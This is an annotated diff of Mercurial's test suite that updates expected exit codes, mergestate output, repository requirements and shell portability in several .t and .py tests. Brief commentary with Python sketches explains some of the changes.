--- a/tests/test-lfs-serve.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-serve.t Tue Apr 20 11:01:06 2021 -0400
@@ -293,7 +293,7 @@
requesting all changes
remote: abort: no common changegroup version
abort: pull failed on remote
- [255]
+ [100]
$ grep 'lfs' $TESTTMP/client4_pull/.hg/requires $SERVER_REQUIRES
$TESTTMP/server/.hg/requires:lfs
@@ -462,6 +462,7 @@
remote: adding manifests
remote: adding file changes
remote: added 1 changesets with 1 changes to 1 files
+ (sent 8 HTTP requests and * bytes; received * bytes in responses) (glob) (?)
$ grep 'lfs' .hg/requires $SERVER_REQUIRES
.hg/requires:lfs
$TESTTMP/server/.hg/requires:lfs
--- a/tests/test-lfs-test-server.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-test-server.t Tue Apr 20 11:01:06 2021 -0400
@@ -17,7 +17,7 @@
#endif
#if no-windows git-server
- $ lfs-test-server &> lfs-server.log &
+ $ lfs-test-server > lfs-server.log 2>&1 &
$ echo $! >> $DAEMON_PIDS
#endif
@@ -40,6 +40,8 @@
#endif
$ cat >> $HGRCPATH <<EOF
+ > [ui]
+ > paginate=no
> [experimental]
> lfs.worker-enable = False
> [extensions]
@@ -113,7 +115,7 @@
Status: 200 (git-server !)
Status: 201 (hg-server !)
Content-Length: 0
- Content-Type: text/plain; charset=utf-8
+ Content-Type: text/plain; charset=utf-8 (hg-server !)
Date: $HTTP_DATE$
Server: testing stub value (hg-server !)
lfs: processed: 31cf46fbc4ecd458a0943c5b4881f1f5a6dd36c53d6167d5b69ac45149b38e5b
@@ -277,7 +279,7 @@
Status: 200 (git-server !)
Status: 201 (hg-server !)
Content-Length: 0
- Content-Type: text/plain; charset=utf-8
+ Content-Type: text/plain; charset=utf-8 (hg-server !)
Date: $HTTP_DATE$
Server: testing stub value (hg-server !)
lfs: processed: 37a65ab78d5ecda767e8622c248b5dbff1e68b1678ab0e730d5eb8601ec8ad19
@@ -285,7 +287,7 @@
Status: 200 (git-server !)
Status: 201 (hg-server !)
Content-Length: 0
- Content-Type: text/plain; charset=utf-8
+ Content-Type: text/plain; charset=utf-8 (hg-server !)
Date: $HTTP_DATE$
Server: testing stub value (hg-server !)
lfs: processed: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998
@@ -888,7 +890,7 @@
$ mkdir $TESTTMP/lfs-server2
$ cd $TESTTMP/lfs-server2
#if no-windows git-server
- $ lfs-test-server &> lfs-server.log &
+ $ lfs-test-server > lfs-server.log 2>&1 &
$ echo $! >> $DAEMON_PIDS
#endif
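
Both `lfs-test-server` hunks are a shell-portability fix: `&>` is a bash extension, and a strict POSIX /bin/sh parses `cmd &> log &` as backgrounding `cmd` and then running an empty redirection, so the log is silently lost. The `> log 2>&1` spelling works in any sh. The same redirection expressed in Python, for comparison (a sketch; `lfs-test-server` is the binary the test expects on $PATH):

    import subprocess

    # Equivalent of: lfs-test-server > lfs-server.log 2>&1 &
    with open('lfs-server.log', 'wb') as log:
        proc = subprocess.Popen(['lfs-test-server'],
                                stdout=log,
                                stderr=subprocess.STDOUT)  # 2>&1
    print(proc.pid)  # the test appends this pid to $DAEMON_PIDS
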
--- a/tests/test-log.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-log.t Tue Apr 20 11:01:06 2021 -0400
@@ -2001,6 +2001,26 @@
@@ -0,0 +1,1 @@
+b
+
+Test that diff.merge is respected (file b was added on one side and
+therefore merged cleanly)
+
+ $ hg log -pr 3 --config diff.merge=yes
+ changeset: 3:8e07aafe1edc
+ tag: tip
+ parent: 2:b09be438c43a
+ parent: 1:925d80f479bb
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: 3
+
+ diff -r 8e07aafe1edc a
+ --- a/a Thu Jan 01 00:00:00 1970 +0000
+ +++ b/a Thu Jan 01 00:00:00 1970 +0000
+ @@ -1,1 +1,1 @@
+ -b
+ +c
+
$ cd ..
'hg log -r rev fn' when last(filelog(fn)) != rev
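
The new test-log.t block covers the experimental diff.merge option: when enabled, `hg log -p` shows how a merge commit differs from the automatic merge of its two parents, so a file that merged cleanly (b here) contributes no hunks, while the manual change to a (-b/+c) does. Driving the same check from Python (a sketch; revision 3 is the merge created earlier in the test):

    import subprocess

    out = subprocess.run(
        ['hg', 'log', '-pr', '3', '--config', 'diff.merge=yes'],
        capture_output=True, text=True, check=True,
    ).stdout
    assert '+c' in out  # only the manual merge-time edit produces a hunk
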
--- a/tests/test-mactext.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mactext.t Tue Apr 20 11:01:06 2021 -0400
@@ -27,7 +27,7 @@
transaction abort!
rollback completed
abort: pretxncommit.cr hook failed
- [255]
+ [40]
$ hg cat f | f --hexdump
0000: 68 65 6c 6c 6f 0a |hello.|
--- a/tests/test-manifest.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-manifest.py Tue Apr 20 11:01:06 2021 -0400
@@ -6,6 +6,8 @@
import unittest
import zlib
+from mercurial.node import sha1nodeconstants
+
from mercurial import (
manifest as manifestmod,
match as matchmod,
@@ -436,7 +438,7 @@
class testtreemanifest(unittest.TestCase, basemanifesttests):
def parsemanifest(self, text):
- return manifestmod.treemanifest(b'', text)
+ return manifestmod.treemanifest(sha1nodeconstants, b'', text)
def testWalkSubtrees(self):
m = self.parsemanifest(A_DEEPER_MANIFEST)
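
The test-manifest.py hunk tracks an API change in this series: treemanifest now takes a nodeconstants object as its first argument rather than assuming SHA-1 node sizes globally. The updated call pattern, as the test now exercises it:

    from mercurial.node import sha1nodeconstants
    from mercurial import manifest as manifestmod

    def parsemanifest(text):
        # nodeconstants is now explicit; sha1nodeconstants keeps the
        # traditional 20-byte node behaviour.
        return manifestmod.treemanifest(sha1nodeconstants, b'', text)
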
--- a/tests/test-merge-changedelete.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-changedelete.t Tue Apr 20 11:01:06 2021 -0400
@@ -96,17 +96,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -163,17 +166,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -243,17 +249,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -307,17 +316,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -358,17 +370,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "r")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -405,17 +420,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "r")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -453,17 +471,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -512,17 +533,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -573,17 +597,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -631,17 +658,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -801,11 +831,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -840,11 +872,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -877,11 +911,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -916,11 +952,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -963,11 +1001,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -1011,11 +1051,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
--- a/tests/test-merge-criss-cross.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-criss-cross.t Tue Apr 20 11:01:06 2021 -0400
@@ -540,6 +540,7 @@
other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
extra: other-file (filenode-source = other)
$ hg ci -m "merge-deleting-the-file-from-deleted"
$ hg manifest
@@ -563,6 +564,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
$ hg ci -m "merge-deleting-the-file-from-updated"
created new head
$ hg manifest
@@ -586,6 +588,7 @@
other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
extra: other-file (filenode-source = other)
$ hg ci -m "merge-keeping-the-file-from-deleted"
created new head
@@ -614,6 +617,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
$ hg ci -m "merge-keeping-the-file-from-updated"
created new head
$ hg manifest
@@ -695,6 +699,7 @@
other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): adfd88e5d7d3d3e22bdd26512991ee64d59c1d8f
@@ -763,6 +768,7 @@
other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): a4e0e44229dc130be2915b92c957c093f8c7ee3e
@@ -886,6 +892,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a
@@ -923,6 +930,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a
--- a/tests/test-merge-remove.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-remove.t Tue Apr 20 11:01:06 2021 -0400
@@ -95,7 +95,7 @@
$ hg merge
bar: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat bar
memories of buried pirate treasure
--- a/tests/test-merge-subrepos.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-subrepos.t Tue Apr 20 11:01:06 2021 -0400
@@ -117,10 +117,17 @@
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
XXX: There's a difference between wdir() and '.', so there should be a status.
-`hg files -S` from the top is also missing 'subrepo/b'.
+`hg files -S` from the top is also missing 'subrepo/b'. The file should be
+seen as deleted (and maybe even missing, in which case `hg files` should
+list it)
$ hg st -S
+ R subrepo/b (missing-correct-output !)
$ hg st -R subrepo
+ R subrepo/b (missing-correct-output !)
+
+(note: returns [1] because no files "match", since the list is empty)
+
$ hg files -R subrepo
[1]
$ hg files -R subrepo -r '.'
--- a/tests/test-merge-tools.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-tools.t Tue Apr 20 11:01:06 2021 -0400
@@ -377,7 +377,7 @@
merging f
some fail message
abort: $TESTTMP/mybrokenmerge.py hook failed
- [255]
+ [40]
$ aftermerge
# cat f
revision 1
@@ -1921,7 +1921,7 @@
Binary files capability checking
$ hg update -q -C 0
- $ python <<EOF
+ $ "$PYTHON" <<EOF
> with open('b', 'wb') as fp:
> fp.write(b'\x00\x01\x02\x03')
> EOF
@@ -1929,7 +1929,7 @@
$ hg commit -qm "add binary file (#1)"
$ hg update -q -C 0
- $ python <<EOF
+ $ "$PYTHON" <<EOF
> with open('b', 'wb') as fp:
> fp.write(b'\x03\x02\x01\x00')
> EOF
--- a/tests/test-merge1.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge1.t Tue Apr 20 11:01:06 2021 -0400
@@ -113,7 +113,7 @@
$ hg merge 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
#if symlink
symlinks to directories should be treated as regular files (issue5027)
@@ -122,7 +122,7 @@
$ hg merge 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
symlinks shouldn't be followed
$ rm b
$ echo This is file b1 > .hg/b
@@ -130,7 +130,7 @@
$ hg merge 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ rm b
$ echo This is file b2 > b
@@ -144,7 +144,7 @@
$ hg merge 1 --config merge.checkunknown=abort
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
this merge should warn
$ hg merge 1 --config merge.checkunknown=warn
@@ -188,7 +188,7 @@
$ hg merge 3 --config merge.checkignored=ignore --config merge.checkunknown=abort
remoteignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore
merging .hgignore
merging for .hgignore
@@ -210,15 +210,15 @@
b: untracked file differs
localignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore
localignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=abort
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=warn
b: replacing untracked file
localignored: replacing untracked file
--- a/tests/test-minirst.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-minirst.py Tue Apr 20 11:01:06 2021 -0400
@@ -159,6 +159,8 @@
:a: First item.
:ab: Second item. Indentation and wrapping
is handled automatically.
+:c\:d: a key with colon
+:efg\:\:hh: a key with many colon
Next list:
--- a/tests/test-minirst.py.out Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-minirst.py.out Tue Apr 20 11:01:06 2021 -0400
@@ -439,6 +439,8 @@
a First item.
ab Second item. Indentation and wrapping is
handled automatically.
+c:d a key with colon
+efg::hh a key with many colon
Next list:
@@ -456,6 +458,9 @@
wrapping is
handled
automatically.
+c:d a key with colon
+efg::hh a key with many
+ colon
Next list:
@@ -476,6 +481,10 @@
<dd>First item.
<dt>ab
<dd>Second item. Indentation and wrapping is handled automatically.
+ <dt>c:d
+ <dd>a key with colon
+ <dt>efg::hh
+ <dd>a key with many colon
</dl>
<p>
Next list:
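
These minirst hunks add coverage for escaped colons in field-list names: `:c\:d:` must yield the key `c:d` instead of ending the field name at the first colon, as the .out expectations above confirm in both text and HTML form. A toy parser for just this escaping rule (an illustration, not minirst's grammar):

    import re

    FIELD = re.compile(r'^:((?:[^\\:]|\\.)+):(?: +(.*))?$')

    def parse_field(line):
        """Split ':name: value', honouring backslash-escaped colons."""
        m = FIELD.match(line)
        if not m:
            return None
        return m.group(1).replace('\\:', ':'), m.group(2) or ''

    print(parse_field(r':c\:d: a key with colon'))            # ('c:d', ...)
    print(parse_field(r':efg\:\:hh: a key with many colon'))  # ('efg::hh', ...)
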
--- a/tests/test-mq-qfold.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mq-qfold.t Tue Apr 20 11:01:06 2021 -0400
@@ -235,7 +235,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
original message
--- a/tests/test-mq-qnew.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mq-qnew.t Tue Apr 20 11:01:06 2021 -0400
@@ -310,7 +310,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
--- a/tests/test-mq-qrefresh-replace-log-message.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mq-qrefresh-replace-log-message.t Tue Apr 20 11:01:06 2021 -0400
@@ -191,7 +191,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
Fifth commit message
This is the 5th log message
@@ -235,7 +235,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
(rebuilding at failure of qrefresh bases on rev #0, and it causes
dropping status of "file2")
@@ -273,7 +273,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ sh "$TESTTMP/checkvisibility.sh"
====
@@ -315,7 +315,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ sh "$TESTTMP/checkvisibility.sh"
====
--- a/tests/test-narrow-clone-no-ellipsis.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-clone-no-ellipsis.t Tue Apr 20 11:01:06 2021 -0400
@@ -26,6 +26,8 @@
dotencode
fncache
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-narrow-clone-stream.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-clone-stream.t Tue Apr 20 11:01:06 2021 -0400
@@ -39,7 +39,7 @@
streaming all changes
remote: abort: server does not support narrow stream clones
abort: pull failed on remote
- [255]
+ [100]
Enable stream clone on the server
@@ -68,6 +68,8 @@
fncache (flat-fncache !)
generaldelta
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-narrow-clone.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-clone.t Tue Apr 20 11:01:06 2021 -0400
@@ -42,6 +42,8 @@
dotencode
